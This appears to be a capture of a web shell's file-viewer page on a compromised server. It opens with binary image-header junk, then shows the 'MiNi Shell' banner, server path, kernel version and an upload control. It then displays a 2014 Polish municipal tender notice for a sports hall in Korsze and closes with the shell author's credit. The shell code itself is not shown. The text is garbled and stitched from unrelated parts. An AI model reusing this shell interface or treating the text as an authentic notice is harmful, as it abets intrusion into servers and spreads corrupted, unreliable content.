JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140911/303228-N-2014.html

<p class="kh_header"><b>Korsze: Budowa hali widowiskowo-sportowej w Korszach wraz z przebudową części przyległego budynku szkoły wraz z finansowaniem</b><br>
<b>Numer ogłoszenia: 303228 - 2014; data zamieszczenia: 11.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy i Miasta w Korszach , ul. Mickiewicza 13, 11-430 Korsze, woj. warmińsko-mazurskie, tel. 089 7541828, faks 089 7540011.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.korsze.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa hali widowiskowo-sportowej w Korszach wraz z przebudową części przyległego budynku szkoły wraz z finansowaniem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są niżej opisane roboty budowlane wraz z finansowaniem.
          Obiekt przeznaczony jest do celów sportowych, rekreacyjnych, kulturowych jako sala widowiskowo -  sportowa  wraz  za  zapleczem  socjalno-sanitarnym,  widownią  i  pomieszczeniami  towarzyszącymi.  Budynek połączony będzie z istniejącą szkołą.
Część główna budynku hali widowiskowo sportowej:  
długość - 52,16m, szerokość- 31,94m, wysokość - 12,00m 
Część łącząca halę widowiskowo - sportową z budynkiem szkoły: 
Długość - 13,50m, szerokość - 20,48m wysokość - 10,88m
 
Kubatura: 17.604,00 m3     
Budynek  hali  widowiskowo-sportowej  składa  się  z  części  głównej  w  palnie  zbliżonej  do  prostokąta    (sala gimnastyczna,  widownia  oraz  zaplecze)  oraz  z  części  łączącej  główny  budynek  hali  z  istniejącą  szkołą (pomieszczenia  pomocnicze  i  uzupełniające).  Dach  dwuspadowy.  Nachylenie  połaci  dachowych  o  kącie  12°. Dach  przykryty  blachą  trapezową  w  kolorze  ceglastej  czerwieni.  Ściany  zewnętrzne  wykończone  tynkiem cienkowarstwowym oraz płytkami klinkierowymi.  

Budynek realizowany będzie w II kategorii geotechnicznej. W oparciu o badania geologiczne przeprowadzone przez firmę EKO - GEO SUWAŁKI s.c. można stwierdzić, że na badanym terenie występują złożone warunki gruntowe.  

Od  powierzchni  badanego  terenu  kolejno  zalegają:  -  grunty  organiczne  (utwory  glebowe)  stanowiące  grunt niebudowlany, nasypy niekontrolowane stanowiące grunt niebudowlany, - grunty spoiste (gliny, gliny piaszczyste) w stanie twardoplastycznym stanowiące nośne podłoże budowlane.  
W  wykonanych  otworach  geotechnicznych  nawiercono  poziom  wody  gruntowej  w  postaci  silnych  sączeń  w gruntach spoistych stabilizujących się na głębokości od 1,8 do 0,4m ppt. 
Strefa przemarzania dla badanego terenu wynosi 1,2m ppt.

2. Wykonawca zobowiązany jest do zapewnienia Zamawiającemu finansowania jego zobowiązań za wykonane przez Wykonawcę dostawy i usługi w ramach umowy zawartej w celu realizacji przedmiotowego zdania (Wierzytelności), polegającego na umożliwieniu Zamawiającemu zapłatę tychże Zobowiązań na następujących warunkach: 
-	spłata Wierzytelności następować będzie w częściach (w ratach) miesięcznych w okresie do 31 grudnia 2025 r., z tym ustaleniem, że w okresie do dnia 31 grudnia 2020 r. Zamawiający będzie zobowiązany do spłaty nie więcej niż 2000zł miesięcznie Zobowiązań,
-	jeśli Wykonawca przewidzi obowiązek zapłaty przez Zamawiającego odsetek z tytułu odroczenia zapłaty Wierzytelności (Odsetki), to wówczas Odsetki będą płatne miesięcznie,
-	Odsetki liczone są wyłącznie od wartości faktycznego zadłużenia i będą naliczane w miesięcznych kalendarzowych okresach obrachunkowych z terminem ich zapłaty do dnia 15-tego następnego miesiąca
-	Zamawiający będzie miał uprawnienie do wcześniejszej spłaty Wierzytelności bez obowiązku z jego strony do zapłaty jakichkolwiek dodatkowych kosztów z tego tytułu.    
-	Zamawiający będzie miał prawo w szczególnych okolicznościach leżących po stronie Zamawiającego do zmiany i wydłużenia harmonogramu spłat wierzytelności 
-	Odsetki liczone są wyłącznie od wartości faktycznego zadłużenia.

Zamawiający wyraża zgodę na zbycie przez Wykonawcę przysługujących mu wobec Zamawiającego wierzytelności o zapłatę wynagrodzenia z tytułu wykonanych dostaw i usług w ramach realizacji przedmiotu zamówienia na instytucję finansującą po 25 dniach od daty prawidłowego wystawienia i dostarczenia faktury Zamawiającemu..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6  Pzp.(Dz. U. z dnia 09.08.2013 r., poz. 907 z późn. zm.).</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.25-9, 66.00.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Każdy Wykonawca zobowiązany jest do wniesienia wadium w wysokości 150 000,00 złotych ( słownie : sto pięćdziesiąt tysięcy złotych).
2.	Wadium wnosi się przed upływem terminu składania ofert.
3.	Wadium może być wnoszone w jednej lub kilku następujących formach:
	3.1.  pieniądzu;
	3.2.  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
              kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
	3.3.  gwarancjach bankowych;
	3.4.  gwarancjach ubezpieczeniowych;
	3.5.  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2  
  ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju   
  Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
4.	Wadium wnoszone w gotówce należy  wpłacić przelewem  na   rachunek bankowy Zamawiającego Wadium wnoszone w pieniądzu wpłaca się przelewem na następujący rachunek bankowy: w Banku Ochrony Środowiska S.A Oddział w Olsztynie ul. Plac Konsulatu Polskiego 6 10-900 Olsztyn nr 28 15 40 10 72 20 01 5050 38 25 00 03, z dopiskiem: Wadium postępowania przetargowego pn: Budowa hali widowiskowo-sportowej   w Korszach wraz z przebudową części przyległego budynku szkoły wraz z finansowaniem   

5.	Wadium wniesione w formie poręczeń, gwarancji, należy złożyć w oryginale w kasie UM -  I piętro w terminie nie późniejszym niż termin składania ofert lub włożyć do koperty, w której znajduje się oferta (nie bindować, nie zszywać z ofertą, jest to
      dokument, który nie stanowi oferty i podlega zwrotowi ) Wykonawca winien  uzyskać potwierdzenie złożenia wadium.
6.	W przypadku wniesienia wadium w formie poręczeń, gwarancji bankowych, ubezpieczeniowych, ich treść ma być zgodna z załączonym wzorem 2.6 (bezwarunkowa      
i na pierwsze żądanie, obejmująca okres związania oferta tj. 30 dni - art. 85 ustawy).
7.	Zaleca się by kopię dowodu wniesienia wadium poświadczoną za zgodność z oryginałem przez osobę podpisującą ofertę - w przypadku wniesienia wadium w pieniądzu lub osobę przyjmującą do depozytu - w przypadku wniesienia wadium w pozostałych formach, przykleić do koperty lub włożyć do koperty, w której znajduje się oferta przetargowa.
8.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po unieważnieniu postępowania lub wyborze oferty najkorzystniejszej, z wyjątkiem wykonawcy którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem ust.13.
9.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesienia zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
10.	Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert;
11.	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie ust. 8, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 
12.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
13.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, 
o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to 
z przyczyn nieleżących po jego stronie.
14.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
	14.1.  odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach    
	          określonych w ofercie;
	14.2.  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
	14.3.  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
		    z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez wykonawcę realizacji co najmniej 1 roboty budowlanej polegającej na budowie obiektu kubaturowego w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Uszczegółowienie - Obiekty winny być nie mniejsze niż 6.000m3 kubatury.
 Wymagane jest, wykazanie przez wykonawcę że wykonał 1 (jedną) usługę finansowania projektów inwestycyjnych, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
Uszczegółowienie - Kwota finansowania nie mniejsza niż 6.000.000,00 PLN brutto
poparte dokumentami potwierdzającym, że roboty zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami  sztuki budowlanej i prawidłowo ukończone. Ocena zgodnie z formuła spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy wykazać, że Wykonawca/y dysponują lub 
         będą dysponować osobami zdolnymi do wykonania zamówienia, które posiadają   
         kwalifikacje zawodowe zgodnie z wymogami przepisów ustawy z dnia 7 lipca 1994 r.- 
         Prawo Budowlane/Dz.U. z 2006 r.Nr 156, poz.118 z późn. zm./ niezbędne do wykonania 
         zamówienia, z uprawnieniami budowlanymi do pełnienia samodzielnej funkcji 
         kierowniczej w specjalności ogólnobudowlanej, sanitarnej elektrycznej oraz c.o. oraz przedłożą informacje  na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, a także zakresu wykonywanych przez nich czynności oraz informację o podstawie do dysponowania  tymi osobami.
Ocena zgodnie z formuła spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy wykazać że wykonawca posiada
          opłaconą polisę od odpowiedzialności cywilnej w przypadku jej braku inny dokument
          potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej 
         w zakresie prowadzonej działalności związanej z  przedmiotem zamówienia na kwotę 
       nie mniejszą niż  6 000 000,00 zł brutto. Ocena zgodnie z formuła spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wymogiem Zamawiającego ponadto jest, by wykonawca wraz z ofertą przedłożył promesę  instytucji finansującej lub zawartą z instytucją finansującą umowę, która zapewni długoterminowe finansowanie spłaty Wierzytelności  za wykonane przez Wykonawcę dostawy i usługi z uwzględnieniem pkt III Opis przedmiotu zamówienia ppkt 2 SIWZ oraz przedstawił warunki ich spłaty. Koszty finansowania będą brane pod uwagę w kryterium przy wyborze najkorzystniejszej oferty. Zamawiający posiada stosowną zgodę Rady Miasta na zaciągnięcie zobowiązania finansowego na przedmiotową inwestycję wraz z kosztami finansowymi wynikającymi zarówno z części stałej finansowania (marża instytucji finansującej) oraz części zmiennej zależnej stopy procentowej.
Wykonawcy ponoszą wszelkie koszty związane z przygotowaniem i złożeniem oferty oraz koszty związane z przygotowaniem umów z instytucją finansującą</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia treści niniejszej umowy, a w szczególności zmiana zakresu robót wymagają pod rygorem nieważności zgody obu stron  wyrażonej na piśmie w formie aneksu.
2. Niedopuszczalna jest zmiana postanowień zawartej umowy oraz wprowadzenia nowych postanowień do umowy, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty, na podstawie której dokonano wyboru Wykonawcy, z wyjątkiem :
1)	sytuacji wymienionych w  ust. 3
2)	dokonania zmian w projekcie budowlanym,
3)	zmiany ceny, gdy:
a)	nastąpi urzędowa zmiana stawki podatku VAT,
b)	Zamawiający ograniczy zakres zamówienia, wprowadzi zamienne rozwiązania lub materiały.
       - podstawą ustalenia nowej ceny będą niezmienione ceny, stawki i narzuty z
          kosztorysu ofertowego.
3) Roboty zamienne rozliczane będą kosztorysami różnicowymi,  
4) podwykonawstwa - za uprzednią zgodą Zamawiającego :
    a) powierzenia podwykonawcom innej części robót niż wskazana w ofercie Wykonawcy,
    b) powierzenia podwykonawcom części robót, mimo oświadczenia o samodzielnej
          realizacji zamówienia złożonego przez Wykonawcę w ofercie,
           5) pozostałym, w szczególności :
       a) w przypadku zastosowania materiałów i technologii innych niż określone 
           w umowie, pod warunkiem, że ich parametry techniczne i jakościowe nie będą 
          gorsze niż wskazane w umowie - zmiana wymaga zgody obu stron,
       b) zmian korzystnych dla Zamawiającego w szczególności obniżenia kosztów 
           realizacji robót lub podwyższenie standardu realizowanej roboty,
       c) nieprzewidywalnym na etapie wszczęcia postępowania, którego wprowadzenie 
           jest niezbędne do  realizacji zamówienia,
      d) zmiany formy organizacyjno prawnej, przekształcenia lub połączenia wykonawców,
      e) doprecyzowania zapisów umowy
 6. Warunki zmian :
    1) inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego,
    2) uzasadnienie zmian - w szczególności: prawidłowa realizacja przedmiotu umowy, obniżenie kosztów, zapewnienie optymalnych parametrów technicznych 
i jakościowych robót,
    3) forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności.
7. Zamawiający nie przedłuży terminu wykonania umowy, jeżeli zmiana będzie wymuszona uchybieniem (np. zbyt późne złożenie odpowiedniego wniosku) lub naruszeniem umowy przez Wykonawcę.
      a) opóźnienia przekazania w ustalonych terminach placu budowy przez Zamawiającego,
      b) zlecenia robót dodatkowych lub zamiennych jeżeli terminy ich zlecenia, rodzaj lub
           zakres mają wpływ na pierwotny termin umowy,
     c) przerwy w realizacji robót powstałych na skutek przyczyn niezależnych od 
        Wykonawcy i Zamawiającego np. awarie instalacji wewnątrz budynku, długotrwały 
         brak dostawy prądu.
     d) wstrzymania prac przez Zamawiającego albo przerw w wykonaniu prac powstałych z 
          winy Zamawiającego a spowodowanych okolicznościami, których nie mógł 
 przewidzieć w chwili zawarcia umowy, mających wpływ na prowadzenie i realizację usługi.
8. Dopuszcza się możliwość zmiany postanowień niniejszej umowy w przypadku:
    a) dokładniejszego doprecyzowania zapisów umowy,
    b) wprowadzenia zmian korzystnych dla Zamawiającego, w szczególności obniżenia 
 kosztów zadania lub podniesienia standardu wykonywanego zadania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.korsze.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Korszach ul. Mickiewicza 13 11-430 Korsze.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.09.2014 godzina 12:00, miejsce: Urząd Miejski w Korszach ul. Mickiewicza 13 11-430 Korsze - sekretariat i piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com